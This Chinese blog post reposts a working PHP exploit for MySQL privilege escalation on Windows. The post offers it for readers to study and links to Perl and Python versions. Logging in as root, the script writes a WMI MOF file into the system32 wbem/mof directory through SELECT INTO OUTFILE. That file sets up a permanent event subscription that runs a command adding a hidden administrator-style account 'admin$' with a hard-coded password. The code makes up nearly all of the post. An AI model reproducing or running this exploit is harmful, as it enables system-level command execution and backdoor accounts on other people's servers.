之前本人的博客发过perl,python版的提权,这里再发一个php版,大家拿去研究一下。。也是转的。

其它版本请看下面的连接:

http://back.waitalone.cn/post/MySQL_Remote_Poc.html


http://back.waitalone.cn/post/MySQL_Python_priv.html

http://www.linux520.com/bbs/viewthread.php?tid=9432

代码如下:

<?php

$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$cmdshell="net user admin$ qwe!@#123qwe /add";
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
$result=mysql_query($sql);
mysql_close($conn);
?>

 

原文地址:http://lcx.cc/?i=3197